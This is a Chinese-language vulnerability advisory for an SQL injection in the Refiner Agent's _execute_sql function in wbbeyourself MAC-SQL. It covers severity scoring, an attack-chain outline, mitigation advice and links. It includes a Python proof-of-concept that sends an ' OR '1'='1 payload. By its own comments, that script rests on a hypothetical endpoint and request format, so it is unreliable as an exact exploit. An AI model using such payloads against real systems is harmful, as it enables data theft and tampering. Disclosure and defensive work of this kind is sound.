CVE-2026-5587 wbbeyourself MAC-SQL SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5587

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

wbbeyourself MAC-SQL

漏洞概述

wbbeyourself MAC-SQL在特定提交版本前存在SQL注入漏洞。该漏洞位于core/agents.py文件的Refiner Agent组件的_execute_sql函数中，由于未对用户输入进行有效过滤，攻击者可远程利用此漏洞执行恶意SQL语句。目前利用代码已公开且厂商未响应，可能导致数据泄露或篡改，风险较高。

技术细节

该漏洞源于wbbeyourself MAC-SQL项目核心组件中的代码逻辑缺陷。具体而言，在`core/agents.py`文件的Refiner Agent组件中，`_execute_sql`函数负责执行SQL指令。该函数在接收外部输入时，未进行充分的输入清洗或使用预编译语句（Prepared Statements），而是直接将用户可控的参数拼接到SQL查询字符串中。这种不安全的编码方式允许攻击者通过构造恶意的SQL语法（如`' OR 1=1 --`）来篡改原始查询逻辑。根据CVSS 3.1向量分析，该漏洞攻击复杂度低（AC:L），无需用户交互（UI:N），且通过网络即可发起攻击（AV:N）。攻击者利用此漏洞可导致数据库机密性、完整性及可用性受损。由于产品采用滚动发布模式，受影响范围涵盖提交哈希`31a9df5e0d520be4769be57a4b9022e5e34a14f4`之前的所有版本。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行wbbeyourself MAC-SQL，且版本在受影响的提交哈希31a9df5e0d520be4769be57a4b9022e5e34a14f4之前。

STEP 2

漏洞探测

攻击者向Refiner Agent组件的API接口发送特制的探测数据，测试_execute_sql函数是否存在SQL注入漏洞。

STEP 3

构造攻击载荷

基于探测结果，攻击者构造恶意SQL语句（如UNION SELECT或布尔盲注Payload），旨在绕过认证或提取敏感数据。

STEP 4

执行利用

攻击者通过网络将包含恶意SQL代码的请求发送至服务器，由于未进行输入过滤，数据库直接执行了攻击者的SQL指令。

STEP 5

达成目标

成功获取数据库中的敏感信息（低机密性影响），或修改/删除数据（低完整性/可用性影响）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Proof of Concept for CVE-2026-5587
# Target: wbbeyourself MAC-SQL (Refiner Agent component)
# Vulnerable File: core/agents.py -> _execute_sql

def exploit_sql_injection(target_url, injection_payload):
    """
    Simulates sending a payload to the vulnerable _execute_sql function.
    Note: Actual endpoint and JSON structure depend on the specific API implementation.
    """
    # Example payload to test SQL injection
    payload = injection_payload
    
    # Hypothetical data structure that might be passed to the Refiner Agent
    data = {
        "agent": "refiner",
        "task": "execute_query",
        "params": {
            "query": f"SELECT * FROM config WHERE id = {payload}" 
        }
    }

    headers = {
        "Content-Type": "application/json"
    }

    try:
        print(f"[*] Sending payload to {target_url}...")
        response = requests.post(target_url, data=json.dumps(data), headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response:", response.text)
            # Check for common SQL error signatures or unexpected data leakage
            if "syntax error" in response.text.lower() or "mysql" in response.text.lower():
                print("[!] Potential SQL Injection vulnerability confirmed via database error.")
            else:
                print("[?] Check response manually for data leakage.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://127.0.0.1:8080/api/agent/execute"
    
    # Basic SQL Injection test payload
    test_payload = "' OR '1'='1"
    
    exploit_sql_injection(target, test_payload)

影响范围

wbbeyourself MAC-SQL <= commit 31a9df5e0d520be4769be57a4b9022e5e34a14f4

防御指南

临时缓解措施

由于厂商尚未响应，建议暂时在网络层面限制对Refiner Agent组件的外部访问，利用Web应用防火墙（WAF）规则拦截针对SQL注入特征的流量，并密切监控数据库日志以检测异常查询活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5587
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5587
3 Details https://www.cvedetails.com/cve/CVE-2026-5587/
4 VulDB https://vuldb.com/cve/CVE-2026-5587
5 Link https://github.com/Ka7arotto/cve/blob/main/MAC-SQL/issue.md
6 Link https://vuldb.com/submit/784459
7 Link https://vuldb.com/vuln/355386
8 Link https://vuldb.com/vuln/355386/cti